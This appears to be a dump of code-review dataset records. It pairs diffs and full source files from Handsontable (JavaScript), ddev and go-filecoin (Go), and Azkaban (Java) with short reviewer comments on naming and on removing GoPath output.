this.runLocalHooks('afterIsMultipleSelection', isMultipleListener); return isMultipleListener.value; } /** * Selects cell relative to the current cell (if possible). * * @param {number} rowDelta Rows number to move, value can be passed as negative number. * @param {number} colDelta Columns number to move, value can be passed as negative number. * @param {boolean} force If `true` the new rows/columns will be created if necessary. Otherwise, row/column will * be created according to `minSpareRows/minSpareCols` settings of Handsontable. */ transformStart(rowDelta, colDelta, force) { const rangeStartAfterTranslation = this.transformation.transformStart(rowDelta, colDelta, force); const rangeStartChanged = this.getSelectedRange().current().highlight !== rangeStartAfterTranslation; // This conditional handle situation when we select cells by headers and there are no visible cells // (all rows / columns are hidden or there is specific cases described in the #6733). Cells in such case are selected // with row headers, but selection is adjusted to start from index 0, not index -1. We loose some information, so // performing "the same selection" basing on internally stored data would give other effect. if (rangeStartChanged) { this.setRangeStart(rangeStartAfterTranslation); } } /** * Sets selection end cell relative to the current selection end cell (if possible). * * @param {number} rowDelta Rows number to move, value can be passed as negative number. * @param {number} colDelta Columns number to move, value can be passed as negative number. */ transformEnd(rowDelta, colDelta) { this.setRangeEnd(this.transformation.transformEnd(rowDelta, colDelta)); } /** * Returns currently used layer level. * * @returns {number} Returns layer level starting from 0. If no selection was added to the table -1 is returned. */ getLayerLevel() { return this.selectedRange.size() - 1; } /** * Returns `true` if currently there is a selection on the screen, `false` otherwise. 
* * @returns {boolean} */ isSelected() { return !this.selectedRange.isEmpty(); } /** * Returns `true` if the selection was applied by clicking to the row header. If the `layerLevel` * argument is passed then only that layer will be checked. Otherwise, it checks if any row header * was clicked on any selection layer level. * * @param {number} [layerLevel=this.getLayerLevel()] Selection layer level to check. * @returns {boolean} */ isSelectedByRowHeader(layerLevel = this.getLayerLevel()) { return layerLevel === -1 ? this.selectedByRowHeader.size > 0 : this.selectedByRowHeader.has(layerLevel); } /** * Returns `true` if the selection was applied by clicking to the column header. If the `layerLevel` * argument is passed then only that layer will be checked. Otherwise, it checks if any column header * was clicked on any selection layer level. * * @param {number} [layerLevel=this.getLayerLevel()] Selection layer level to check. * @returns {boolean} */ isSelectedByColumnHeader(layerLevel = this.getLayerLevel()) { return layerLevel === -1 ? this.selectedByColumnHeader.size > 0 : this.selectedByColumnHeader.has(layerLevel); } /** * Returns `true` if the selection was applied by clicking on the row or column header on any layer level. * * @returns {boolean} */ isSelectedByAnyHeader() { return this.isSelectedByRowHeader(-1) || this.isSelectedByColumnHeader(-1); } /** * Returns `true` if the selection was applied by clicking on the left-top corner overlay. * * @returns {boolean} */ isSelectedByCorner() { return this.selectedByCorner; } /** * Returns `true` if coords is within selection coords. This method iterates through all selection layers to check if * the coords object is within selection range. * * @param {CellCoords} coords The CellCoords instance with defined visual coordinates. * @returns {boolean} */ inInSelection(coords) { return this.selectedRange.includes(coords); } /** * Returns `true` if the cell corner should be visible. * * @private * @returns {boolean} `true` if the corner element has to be visible, `false` otherwise. */ isCellCornerVisible() { return this.settings.fillHandle && !this.tableProps.isEditorOpened() && !this.isMultiple(); } /** * Returns `true` if the area corner should be visible. * * @param {number} layerLevel The layer level. * @returns {boolean} `true` if the corner element has to be visible, `false` otherwise. */ isAreaCornerVisible(layerLevel) { if (Number.isInteger(layerLevel) && layerLevel !== this.getLayerLevel()) { return false; } return this.settings.fillHandle && !this.tableProps.isEditorOpened() && this.isMultiple(); } /** * Clear the selection by resetting the collected ranges and highlights. */ clear() { this.selectedRange.clear(); this.highlight.clear(); } /** * Deselects all selected cells. */ deselect() { if (!this.isSelected()) { return; } this.inProgress = false; this.clear(); this.runLocalHooks('afterDeselect'); } /** * Select all cells. */ selectAll() { const nrOfRows = this.tableProps.countRows(); const nrOfColumns = this.tableProps.countCols(); // We can't select cells when there is no data. if (nrOfRows === 0 || nrOfColumns === 0) { return; } this.clear(); this.setRangeStartOnly(new CellCoords(-1, -1)); this.selectedByRowHeader.add(this.getLayerLevel()); this.selectedByColumnHeader.add(this.getLayerLevel()); this.setRangeEnd(new CellCoords(nrOfRows - 1, nrOfColumns - 1)); this.finish(); } /** * Make multiple, non-contiguous selection specified by `row` and `column` values or a range of cells * finishing at `endRow`, `endColumn`. 
The method supports two input formats, first as an array of arrays such * as `[[rowStart, columnStart, rowEnd, columnEnd]]` and second format as an array of CellRange objects. * If the passed ranges have another format the exception will be thrown. * * @param {Array[]|CellRange[]} selectionRanges The coordinates which define what the cells should be selected. * @returns {boolean} Returns `true` if selection was successful, `false` otherwise. */ selectCells(selectionRanges) { const selectionType = detectSelectionType(selectionRanges); if (selectionType === SELECTION_TYPE_EMPTY) { return false; } else if (selectionType === SELECTION_TYPE_UNRECOGNIZED) { throw new Error(toSingleLine`Unsupported format of the selection ranges was passed. To select cells pass\x20 the coordinates as an array of arrays ([[rowStart, columnStart/columnPropStart, rowEnd, columnEnd/columnPropEnd]])\x20 or as an array of CellRange objects.`); } const selectionSchemaNormalizer = normalizeSelectionFactory(selectionType, { propToCol: prop => this.tableProps.propToCol(prop), keepDirection: true, }); const nrOfRows = this.tableProps.countRows(); const nrOfColumns = this.tableProps.countCols(); // Check if every layer of the coordinates are valid. const isValid = !selectionRanges.some((selection) => { const [rowStart, columnStart, rowEnd, columnEnd] = selectionSchemaNormalizer(selection); const _isValid = isValidCoord(rowStart, nrOfRows) && isValidCoord(columnStart, nrOfColumns) && isValidCoord(rowEnd, nrOfRows) && isValidCoord(columnEnd, nrOfColumns); return !_isValid; }); if (isValid) { this.clear(); arrayEach(selectionRanges, (selection) => { const [rowStart, columnStart, rowEnd, columnEnd] = selectionSchemaNormalizer(selection); this.setRangeStartOnly(new CellCoords(rowStart, columnStart), false); this.setRangeEnd(new CellCoords(rowEnd, columnEnd)); this.finish(); }); } return isValid; } /** * Select column specified by `startColumn` visual index or column property or a range of columns finishing at `endColumn`. * * @param {number|string} startColumn Visual column index or column property from which the selection starts. * @param {number|string} [endColumn] Visual column index or column property from to the selection finishes. * @returns {boolean} Returns `true` if selection was successful, `false` otherwise. */ selectColumns(startColumn, endColumn = startColumn) { const start = typeof startColumn === 'string' ? this.tableProps.propToCol(startColumn) : startColumn; const end = typeof endColumn === 'string' ? this.tableProps.propToCol(endColumn) : endColumn; const nrOfColumns = this.tableProps.countCols(); const nrOfRows = this.tableProps.countRows(); const isValid = nrOfRows > 0 && isValidCoord(start, nrOfColumns) && isValidCoord(end, nrOfColumns); if (isValid) { this.setRangeStartOnly(new CellCoords(-1, start)); this.setRangeEnd(new CellCoords(nrOfRows - 1, end)); this.finish(); } return isValid; } /** * Select row specified by `startRow` visual index or a range of rows finishing at `endRow`. * * @param {number} startRow Visual row index from which the selection starts. * @param {number} [endRow] Visual row index from to the selection finishes. * @returns {boolean} Returns `true` if selection was successful, `false` otherwise. 
*/ selectRows(startRow, endRow = startRow) { const nrOfRows = this.tableProps.countRows(); const nrOfColumns = this.tableProps.countCols(); const isValid = isValidCoord(startRow, nrOfRows) && isValidCoord(endRow, nrOfRows); if (isValid) { this.setRangeStartOnly(new CellCoords(startRow, -1)); // Ternary operator placed below handle situation when there are rows, but there are no columns (#6733). this.setRangeEnd(new CellCoords(endRow, nrOfColumns > 0 ? nrOfColumns - 1 : 0)); this.finish(); } return isValid; } /** * Rewrite the rendered state of the selection as visual selection may have a new representation in the DOM. */ refresh() { if (!this.isSelected()) { return; } const cellHighlight = this.highlight.getCell(); const currentLayer = this.getLayerLevel(); cellHighlight.commit().adjustCoordinates(this.selectedRange.current()); // Rewriting rendered ranges going through all layers. for (let layerLevel = 0; layerLevel < this.selectedRange.size(); layerLevel += 1) { this.highlight.useLayerLevel(layerLevel); const areaHighlight = this.highlight.createOrGetArea(); const headerHighlight = this.highlight.createOrGetHeader(); const activeHeaderHighlight = this.highlight.createOrGetActiveHeader(); areaHighlight.commit(); headerHighlight.commit(); activeHeaderHighlight.commit(); } // Reverting starting layer for the Highlight. this.highlight.useLayerLevel(currentLayer); } } mixin(Selection, localHooks); export default Selection;
1
16864
The line exceeds 120 characters.
handsontable-handsontable
js
@@ -62,6 +62,11 @@ func renderAppDescribe(desc map[string]interface{}) (string, error) { ddevapp.RenderAppRow(appTable, desc) output = fmt.Sprint(appTable) + output = output + "\n\nSite Information\n-----------------\n" + siteInfo := uitable.New() + siteInfo.AddRow("PHP version:", desc["php_version"]) + output = output + fmt.Sprint(siteInfo) + // Only show extended status for running sites. if desc["status"] == ddevapp.SiteRunning { output = output + "\n\nMySQL Credentials\n-----------------\n"
1
package cmd import ( "fmt" "github.com/drud/ddev/pkg/ddevapp" "github.com/drud/ddev/pkg/output" "github.com/drud/ddev/pkg/util" "github.com/gosuri/uitable" "github.com/spf13/cobra" ) // DescribeCommand represents the `ddev config` command var DescribeCommand = &cobra.Command{ Use: "describe [sitename]", Short: "Get a detailed description of a running ddev site.", Long: `Get a detailed description of a running ddev site. Describe provides basic information about a ddev site, including its name, location, url, and status. It also provides details for MySQL connections, and connection information for additional services like MailHog and phpMyAdmin. You can run 'ddev describe' from a site directory to stop that site, or you can specify a site to describe by running 'ddev stop <sitename>.`, Run: func(cmd *cobra.Command, args []string) { var siteName string if len(args) > 1 { util.Failed("Too many arguments provided. Please use 'ddev describe' or 'ddev describe [appname]'") } if len(args) == 1 { siteName = args[0] } site, err := ddevapp.GetActiveApp(siteName) if err != nil { util.Failed("Unable to find any active site named %s: %v", siteName, err) } // Do not show any describe output if we can't find the site. if site.SiteStatus() == ddevapp.SiteNotFound { util.Failed("no site found. have you run 'ddev start'?") } desc, err := site.Describe() if err != nil { util.Failed("Failed to describe site %s: %v", err) } renderedDesc, err := renderAppDescribe(desc) util.CheckErr(err) // We shouldn't ever end up with an unrenderable desc. output.UserOut.WithField("raw", desc).Print(renderedDesc) }, } // renderAppDescribe takes the map describing the app and renders it for plain-text output func renderAppDescribe(desc map[string]interface{}) (string, error) { maxWidth := uint(200) var output string appTable := ddevapp.CreateAppTable() ddevapp.RenderAppRow(appTable, desc) output = fmt.Sprint(appTable) // Only show extended status for running sites. if desc["status"] == ddevapp.SiteRunning { output = output + "\n\nMySQL Credentials\n-----------------\n" dbTable := uitable.New() dbinfo := desc["dbinfo"].(map[string]interface{}) if _, ok := dbinfo["username"].(string); ok { dbTable.MaxColWidth = maxWidth dbTable.AddRow("Username:", dbinfo["username"]) dbTable.AddRow("Password:", dbinfo["password"]) dbTable.AddRow("Database name:", dbinfo["dbname"]) dbTable.AddRow("Host:", dbinfo["host"]) dbTable.AddRow("Port:", dbinfo["port"]) output = output + fmt.Sprint(dbTable) output = output + fmt.Sprintf("\nTo connect to mysql from your host machine, use port %[1]v on 127.0.0.1.\nFor example: mysql --host=127.0.0.1 --port=%[1]v --user=db --password=db --database=db", dbinfo["published_port"]) } output = output + "\n\nOther Services\n--------------\n" other := uitable.New() other.AddRow("MailHog:", desc["mailhog_url"]) other.AddRow("phpMyAdmin:", desc["phpmyadmin_url"]) output = output + fmt.Sprint(other) } output = output + "\n" + ddevapp.RenderRouterStatus() return output, nil } func init() { RootCmd.AddCommand(DescribeCommand) }
1
12141
Let's go ahead and change "Site" to "Project", since that's the path we've chosen. One less thing to alter in the other issue.
drud-ddev
php
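The review comment on this record asks for the new "Site" section label to become "Project". Purely as an illustration (it is not part of the patch), here is a minimal, self-contained Go sketch of how the added hunk might read after that rename. The uitable usage and the "php_version" key are taken from the patch itself; the function name renderProjectInfo and the example version string are made up for the sketch.

package main

import (
	"fmt"

	"github.com/gosuri/uitable"
)

// renderProjectInfo sketches the renamed section from the patch: the header
// reads "Project Information" instead of "Site Information", as the review asks.
// The "php_version" key mirrors the one used in the original hunk.
func renderProjectInfo(desc map[string]interface{}) string {
	out := "\n\nProject Information\n-------------------\n"
	info := uitable.New()
	info.AddRow("PHP version:", desc["php_version"])
	return out + fmt.Sprint(info)
}

func main() {
	// "7.1" is a made-up example value, not taken from the record.
	fmt.Print(renderProjectInfo(map[string]interface{}{"php_version": "7.1"}))
}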
@@ -89,7 +89,6 @@ Prints out information about filecoin process and its environment. sw.Printf("\nEnvironment\n") sw.Printf("FilAPI: \t%s\n", info.Environment.FilAPI) sw.Printf("FilPath:\t%s\n", info.Environment.FilPath) - sw.Printf("GoPath: \t%s\n", info.Environment.GoPath) // Print Config Info sw.Printf("\nConfig\n")
1
package commands import ( "encoding/json" "io" "os" "runtime" cmdkit "github.com/ipfs/go-ipfs-cmdkit" cmds "github.com/ipfs/go-ipfs-cmds" sysi "github.com/whyrusleeping/go-sysinfo" "github.com/filecoin-project/go-filecoin/config" "github.com/filecoin-project/go-filecoin/flags" "github.com/filecoin-project/go-filecoin/repo" ) var inspectCmd = &cmds.Command{ Helptext: cmdkit.HelpText{ Tagline: "Show info about the filecoin node", }, Subcommands: map[string]*cmds.Command{ "all": allInspectCmd, "runtime": runtimeInspectCmd, "disk": diskInspectCmd, "memory": memoryInspectCmd, "config": configInspectCmd, "environment": envInspectCmd, }, } var allInspectCmd = &cmds.Command{ Helptext: cmdkit.HelpText{ Tagline: "Print all diagnostic information.", ShortDescription: ` Prints out information about filecoin process and its environment. `, }, Run: func(req *cmds.Request, res cmds.ResponseEmitter, env cmds.Environment) error { var allInfo AllInspectorInfo allInfo.Runtime = GetInspectorAPI(env).Runtime() dsk, err := GetInspectorAPI(env).Disk() if err != nil { return err } allInfo.Disk = dsk mem, err := GetInspectorAPI(env).Memory() if err != nil { return err } allInfo.Memory = mem allInfo.Config = GetInspectorAPI(env).Config() allInfo.Environment = GetInspectorAPI(env).Environment() allInfo.FilecoinVersion = GetInspectorAPI(env).FilecoinVersion() return cmds.EmitOnce(res, allInfo) }, Type: AllInspectorInfo{}, Encoders: cmds.EncoderMap{ cmds.Text: cmds.MakeTypedEncoder(func(req *cmds.Request, w io.Writer, info *AllInspectorInfo) error { sw := NewSilentWriter(w) // Print Version sw.Printf("Version:\t%s\n", info.FilecoinVersion) // Print Runtime Info sw.Printf("\nRuntime\n") sw.Printf("OS: \t%s\n", info.Runtime.OS) sw.Printf("Arch: \t%s\n", info.Runtime.Arch) sw.Printf("Version: \t%s\n", info.Runtime.Version) sw.Printf("Compiler: \t%s\n", info.Runtime.Compiler) sw.Printf("NumProc: \t%d\n", info.Runtime.NumProc) sw.Printf("GoMaxProcs: \t%d\n", info.Runtime.GoMaxProcs) sw.Printf("NumGoRoutines:\t%d\n", info.Runtime.NumGoRoutines) sw.Printf("NumCGoCalls: \t%d\n", info.Runtime.NumCGoCalls) // Print Disk Info sw.Printf("\nDisk\n") sw.Printf("Free: \t%d\n", info.Disk.Free) sw.Printf("Total: \t%d\n", info.Disk.Total) sw.Printf("FSType:\t%s\n", info.Disk.FSType) // Print Memory Info sw.Printf("\nMemory\n") sw.Printf("Swap: \t%d\n", info.Memory.Swap) sw.Printf("Virtual:\t%d\n", info.Memory.Virtual) // Print Environment Info sw.Printf("\nEnvironment\n") sw.Printf("FilAPI: \t%s\n", info.Environment.FilAPI) sw.Printf("FilPath:\t%s\n", info.Environment.FilPath) sw.Printf("GoPath: \t%s\n", info.Environment.GoPath) // Print Config Info sw.Printf("\nConfig\n") marshaled, err := json.MarshalIndent(info.Config, "", "\t") if err != nil { return err } sw.Printf("%s\n", marshaled) return sw.Error() }), }, } var runtimeInspectCmd = &cmds.Command{ Helptext: cmdkit.HelpText{ Tagline: "Print runtime diagnostic information.", ShortDescription: ` Prints out information about the golang runtime. 
`, }, Run: func(req *cmds.Request, res cmds.ResponseEmitter, env cmds.Environment) error { out := GetInspectorAPI(env).Runtime() return cmds.EmitOnce(res, out) }, Type: RuntimeInfo{}, Encoders: cmds.EncoderMap{ cmds.Text: cmds.MakeTypedEncoder(func(req *cmds.Request, w io.Writer, info *RuntimeInfo) error { sw := NewSilentWriter(w) sw.Printf("OS: \t%s\n", info.OS) sw.Printf("Arch: \t%s\n", info.Arch) sw.Printf("Version: \t%s\n", info.Version) sw.Printf("Compiler: \t%s\n", info.Compiler) sw.Printf("NumProc: \t%d\n", info.NumProc) sw.Printf("GoMaxProcs: \t%d\n", info.GoMaxProcs) sw.Printf("NumGoRoutines:\t%d\n", info.NumGoRoutines) sw.Printf("NumCGoCalls: \t%d\n", info.NumCGoCalls) return sw.Error() }), }, } var diskInspectCmd = &cmds.Command{ Helptext: cmdkit.HelpText{ Tagline: "Print filesystem usage information.", ShortDescription: ` Prints out information about the filesystem. `, }, Run: func(req *cmds.Request, res cmds.ResponseEmitter, env cmds.Environment) error { out, err := GetInspectorAPI(env).Disk() if err != nil { return err } return cmds.EmitOnce(res, out) }, Type: DiskInfo{}, Encoders: cmds.EncoderMap{ cmds.Text: cmds.MakeTypedEncoder(func(req *cmds.Request, w io.Writer, info *DiskInfo) error { sw := NewSilentWriter(w) sw.Printf("Free: \t%d\n", info.Free) sw.Printf("Total: \t%d\n", info.Total) sw.Printf("FSType:\t%s\n", info.FSType) return sw.Error() }), }, } var memoryInspectCmd = &cmds.Command{ Helptext: cmdkit.HelpText{ Tagline: "Print memory usage information.", ShortDescription: ` Prints out information about memory usage. `, }, Run: func(req *cmds.Request, res cmds.ResponseEmitter, env cmds.Environment) error { out, err := GetInspectorAPI(env).Memory() if err != nil { return err } return cmds.EmitOnce(res, out) }, Type: MemoryInfo{}, Encoders: cmds.EncoderMap{ cmds.Text: cmds.MakeTypedEncoder(func(req *cmds.Request, w io.Writer, info *MemoryInfo) error { sw := NewSilentWriter(w) sw.Printf("Swap: \t%d\n", info.Swap) sw.Printf("Virtual:\t%d\n", info.Virtual) return sw.Error() }), }, } var configInspectCmd = &cmds.Command{ Helptext: cmdkit.HelpText{ Tagline: "Print in-memory config information.", ShortDescription: ` Prints out information about your filecoin nodes config. `, }, Run: func(req *cmds.Request, res cmds.ResponseEmitter, env cmds.Environment) error { out := GetInspectorAPI(env).Config() return cmds.EmitOnce(res, out) }, Type: config.Config{}, Encoders: cmds.EncoderMap{ cmds.Text: cmds.MakeTypedEncoder(func(req *cmds.Request, w io.Writer, info *config.Config) error { marshaled, err := json.MarshalIndent(info, "", "\t") if err != nil { return err } marshaled = append(marshaled, byte('\n')) _, err = w.Write(marshaled) return err }), }, } var envInspectCmd = &cmds.Command{ Helptext: cmdkit.HelpText{ Tagline: "Print filecoin environment information.", ShortDescription: ` Prints out information about your filecoin nodes environment. `, }, Run: func(req *cmds.Request, res cmds.ResponseEmitter, env cmds.Environment) error { out := GetInspectorAPI(env).Environment() return cmds.EmitOnce(res, out) }, Type: EnvironmentInfo{}, Encoders: cmds.EncoderMap{ cmds.Text: cmds.MakeTypedEncoder(func(req *cmds.Request, w io.Writer, info *EnvironmentInfo) error { sw := NewSilentWriter(w) sw.Printf("FilAPI: \t%s\n", info.FilAPI) sw.Printf("FilPath:\t%s\n", info.FilPath) sw.Printf("GoPath: \t%s\n", info.GoPath) return sw.Error() }), }, } // NewInspectorAPI returns a `Inspector` used to inspect the go-filecoin node. 
func NewInspectorAPI(r repo.Repo) *Inspector { return &Inspector{ repo: r, } } // Inspector contains information used to inspect the go-filecoin node. type Inspector struct { repo repo.Repo } // AllInspectorInfo contains all information the inspector can gather. type AllInspectorInfo struct { Config *config.Config Runtime *RuntimeInfo Environment *EnvironmentInfo Disk *DiskInfo Memory *MemoryInfo FilecoinVersion string } // RuntimeInfo contains information about the golang runtime. type RuntimeInfo struct { OS string Arch string Version string Compiler string NumProc int GoMaxProcs int NumGoRoutines int NumCGoCalls int64 } // EnvironmentInfo contains information about the environment filecoin is running in. type EnvironmentInfo struct { FilAPI string `json:"FIL_API"` FilPath string `json:"FIL_PATH"` GoPath string `json:"GOPATH"` } // DiskInfo contains information about disk usage and type. type DiskInfo struct { Free uint64 Total uint64 FSType string } // MemoryInfo contains information about memory usage. type MemoryInfo struct { Swap uint64 Virtual uint64 } // Runtime returns infrormation about the golang runtime. func (g *Inspector) Runtime() *RuntimeInfo { return &RuntimeInfo{ OS: runtime.GOOS, Arch: runtime.GOARCH, Version: runtime.Version(), Compiler: runtime.Compiler, NumProc: runtime.NumCPU(), GoMaxProcs: runtime.GOMAXPROCS(0), NumGoRoutines: runtime.NumGoroutine(), NumCGoCalls: runtime.NumCgoCall(), } } // Environment returns information about the environment filecoin is running in. func (g *Inspector) Environment() *EnvironmentInfo { return &EnvironmentInfo{ FilAPI: os.Getenv("FIL_API"), FilPath: os.Getenv("FIL_PATH"), GoPath: os.Getenv("GOPATH"), } } // Disk return information about filesystem the filecoin nodes repo is on. func (g *Inspector) Disk() (*DiskInfo, error) { fsr, ok := g.repo.(*repo.FSRepo) if !ok { // we are using a in memory repo return &DiskInfo{ Free: 0, Total: 0, FSType: "0", }, nil } p, err := fsr.Path() if err != nil { return nil, err } dinfo, err := sysi.DiskUsage(p) if err != nil { return nil, err } return &DiskInfo{ Free: dinfo.Free, Total: dinfo.Total, FSType: dinfo.FsType, }, nil } // Memory return information about system meory usage. func (g *Inspector) Memory() (*MemoryInfo, error) { meminfo, err := sysi.MemoryInfo() if err != nil { return nil, err } return &MemoryInfo{ Swap: meminfo.Swap, Virtual: meminfo.Used, }, nil } // Config return the current config values of the filecoin node. func (g *Inspector) Config() *config.Config { return g.repo.Config() } // FilecoinVersion returns the version of go-filecoin. func (g *Inspector) FilecoinVersion() string { return flags.Commit }
1
21307
I am for this change if and only if we are sure the information is no longer helpful. I think this could still be valuable for certain scenarios; what about you?
filecoin-project-venus
go
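The patch drops the GoPath line from the "all" inspector output, while the reviewer suspects the value may still be useful in some scenarios. One possible compromise, offered purely as an illustration and not something proposed in the record, is to print the line only when GOPATH is actually set. The sketch below trims EnvironmentInfo to the fields it needs and uses a plain *os.File writer instead of the project's SilentWriter.

package main

import (
	"fmt"
	"os"
)

// EnvironmentInfo mirrors the struct in the record, reduced to the fields
// needed for this sketch.
type EnvironmentInfo struct {
	FilAPI  string
	FilPath string
	GoPath  string
}

// printEnvironment prints the Environment section, emitting the GoPath line
// only when the value is non-empty -- a middle ground between the patch
// (always drop it) and the review comment (it may still be helpful).
func printEnvironment(w *os.File, info EnvironmentInfo) {
	fmt.Fprintf(w, "\nEnvironment\n")
	fmt.Fprintf(w, "FilAPI: \t%s\n", info.FilAPI)
	fmt.Fprintf(w, "FilPath:\t%s\n", info.FilPath)
	if info.GoPath != "" {
		fmt.Fprintf(w, "GoPath: \t%s\n", info.GoPath)
	}
}

func main() {
	printEnvironment(os.Stdout, EnvironmentInfo{
		FilAPI:  os.Getenv("FIL_API"),
		FilPath: os.Getenv("FIL_PATH"),
		GoPath:  os.Getenv("GOPATH"),
	})
}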
@@ -296,11 +296,16 @@ public class ImageRampupManagerImpl implements ImageRampupManager { if (null == flow) { log.info("Flow object is null, so continue"); final ImageRampup firstImageRampup = imageRampupList.get(0); + + // Find the imageVersion in the Rampup list with maximum rampup percentage. + final ImageRampup maxImageRampup = imageRampupList.stream() + .max(Comparator.comparing(ImageRampup::getRampupPercentage)) + .orElseGet(() -> firstImageRampup); imageTypeRampupVersionMap.put(imageTypeName, - this.fetchImageVersion(imageTypeName, firstImageRampup.getImageVersion()) + this.fetchImageVersion(imageTypeName, maxImageRampup.getImageVersion()) .orElseThrow(() -> new ImageMgmtException( String.format("Unable to fetch version %s from image " + "versions table.", - firstImageRampup.getImageVersion())))); + maxImageRampup.getImageVersion())))); continue; } int prevRampupPercentage = 0;
1
/* * Copyright 2020 LinkedIn Corp. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ package azkaban.imagemgmt.rampup; import azkaban.Constants.ImageMgmtConstants; import azkaban.executor.ExecutableFlow; import azkaban.executor.container.ContainerImplUtils; import azkaban.imagemgmt.daos.ImageRampupDao; import azkaban.imagemgmt.daos.ImageTypeDao; import azkaban.imagemgmt.daos.ImageVersionDao; import azkaban.imagemgmt.dto.ImageMetadataRequest; import azkaban.imagemgmt.exception.ImageMgmtException; import azkaban.imagemgmt.models.ImageRampup; import azkaban.imagemgmt.models.ImageType; import azkaban.imagemgmt.models.ImageVersion; import azkaban.imagemgmt.models.ImageVersion.State; import azkaban.imagemgmt.models.ImageVersionMetadata; import azkaban.imagemgmt.version.VersionInfo; import azkaban.imagemgmt.version.VersionSet; import java.util.Collections; import java.util.Comparator; import java.util.Iterator; import java.util.List; import java.util.Map; import java.util.Optional; import java.util.Set; import java.util.TreeMap; import java.util.TreeSet; import java.util.stream.Collectors; import javax.inject.Inject; import javax.inject.Singleton; import org.apache.commons.collections4.CollectionUtils; import org.slf4j.Logger; import org.slf4j.LoggerFactory; /** * This class is responsible for fetching the version of the available images based on currently * active rampup plan and rampup details or the version which is already ramped up and active. Here * is the version selection process for an image type - 1. Fetch the rampup details for the given * image types or for all the image types (Two such methods are provided). 2. Sort the ramp up data * in ascending order of rampup percentage. 3. Generate a random number between 1 to 100 both * inclusive. Let us say the number the number generated is 60. 4. Let us say there are three * versions 1.1.1, 1.1.2 & and 1.1.3 with rampup percantages 10, 30 and 60 respectively. 5. The * above percentage fors three ranges [1 - 10], [11 - 40] & [41 - 100]. The random humber 60 belongs * to the last range i.e. [41 - 100] and hence version 1.1.3 will be selected. If random number * generated is 22 then version 1.1.2 will be selected and so on. 6. If there is no active rampup * plan for an image type or in the active plan if the version is marked unstable or deprecated, and * latest active version will be selected from the image_verions table. 7. If there is no active * version in the image_versions table, it will throw appropriate error message mentioning could not * select version for the image type and the whole process would fail. 8. Follow the rampup * procedure to elect a new version from the image_versions table for the failed image type. 
*/ @Singleton public class ImageRampupManagerImpl implements ImageRampupManager { private static final Logger log = LoggerFactory.getLogger(ImageRampupManagerImpl.class); private final ImageTypeDao imageTypeDao; private final ImageVersionDao imageVersionDao; private final ImageRampupDao imageRampupDao; private static final String MSG_RANDOM_RAMPUP_VERSION_SELECTION = "The version selection is " + "based on random rampup."; private static final String MSG_ACTIVE_VERSION_SELECTION = "The version selection is " + "based on latest available ACTIVE version."; private static final String MSG_NON_ACTIVE_VERSION_SELECTION = "Non ACTIVE " + "(i.e. NEW/UNSTABLE/DEPRECATED) latest version is selected as there is no active rampup " + "and ACTIVE version."; private static final String MSG_IMAGE_TYPE_WITHOUT_VERSION = "This image type does not have a " + "version yet."; @Inject public ImageRampupManagerImpl(final ImageRampupDao imageRampupDao, final ImageVersionDao imageVersionDao, final ImageTypeDao imageTypeDao) { this.imageRampupDao = imageRampupDao; this.imageVersionDao = imageVersionDao; this.imageTypeDao = imageTypeDao; } @Override public Map<String, VersionInfo> getVersionForAllImageTypes(final ExecutableFlow flow) throws ImageMgmtException { final Map<String, List<ImageRampup>> imageTypeRampups = this.imageRampupDao .getRampupForAllImageTypes(); final List<ImageType> imageTypeList = this.imageTypeDao.getAllImageTypes(); final Set<String> imageTypes = new TreeSet<>(); for (final ImageType imageType : imageTypeList) { imageTypes.add(imageType.getName()); } final Set<String> remainingImageTypes = new TreeSet<>(); final Map<String, ImageVersionMetadata> imageTypeVersionMap = this .processAndGetVersionForImageTypes(flow, imageTypes, imageTypeRampups, remainingImageTypes); // Throw exception if there are left over image types if (!remainingImageTypes.isEmpty()) { throw new ImageMgmtException("Could not fetch version for below image types. Reasons: " + " 1. There is no active rampup plan in the image_rampup_plan table. 2. There is no " + " active version in the image_versions table. 
Image Types: " + remainingImageTypes); } return this.createVersionInfoMap(imageTypeVersionMap); } @Override public Map<String, ImageVersionMetadata> getVersionMetadataForAllImageTypes() throws ImageMgmtException { final Map<String, List<ImageRampup>> imageTypeRampups = this.imageRampupDao .getRampupForAllImageTypes(); final List<ImageType> imageTypeList = this.imageTypeDao.getAllImageTypes(); final Set<String> imageTypes = new TreeSet<>(); for (final ImageType imageType : imageTypeList) { imageTypes.add(imageType.getName()); } final Set<String> remainingImageTypes = new TreeSet<>(); final Map<String, ImageVersionMetadata> imageTypeVersionMap = this.processAndGetVersionForImageTypes(null, imageTypes, imageTypeRampups, remainingImageTypes); if (!remainingImageTypes.isEmpty()) { final Map<String, ImageVersion> imageTypeLatestNonActiveVersionMap = this.getLatestNonActiveImageVersion(remainingImageTypes); log.info("imageTypeLatestNonActiveVersionMap: " + imageTypeLatestNonActiveVersionMap); imageTypeLatestNonActiveVersionMap.forEach((k, v) -> imageTypeVersionMap.put(k, new ImageVersionMetadata(v, MSG_NON_ACTIVE_VERSION_SELECTION))); if (!remainingImageTypes.isEmpty()) { remainingImageTypes.forEach(k -> imageTypeVersionMap.put(k, new ImageVersionMetadata(null, MSG_IMAGE_TYPE_WITHOUT_VERSION))); } } return imageTypeVersionMap; } @Override public Map<String, VersionInfo> validateAndGetUpdatedVersionMap( final ExecutableFlow executableFlow, final VersionSet versionSet) throws ImageMgmtException { // Find the image types for which version is either invalid or not exists final Set<String> imageTypesWithInvalidVersion = versionSet.getImageToVersionMap().entrySet() .stream() .filter(map -> this.imageVersionDao.isInvalidVersion( map.getKey(), map.getValue().getVersion())) .map(map -> map.getKey()) .collect(Collectors.toSet()); final Map<String, VersionInfo> updatedVersionInfoMap = new TreeMap<>( String.CASE_INSENSITIVE_ORDER); if (!imageTypesWithInvalidVersion.isEmpty()) { final Map<String, VersionInfo> versionInfoMap = this .getVersionByImageTypes(executableFlow, imageTypesWithInvalidVersion); // Update the correct version in versionSet versionInfoMap.forEach((k, v) -> updatedVersionInfoMap.put(k, v)); versionSet.getImageToVersionMap().entrySet() .forEach(map -> updatedVersionInfoMap.putIfAbsent(map.getKey(), map.getValue())); } return updatedVersionInfoMap; } @Override public Map<String, VersionInfo> getVersionByImageTypes(final ExecutableFlow flow, final Set<String> imageTypes) throws ImageMgmtException { final Map<String, List<ImageRampup>> imageTypeRampups = this.imageRampupDao .getRampupByImageTypes(imageTypes); final Set<String> 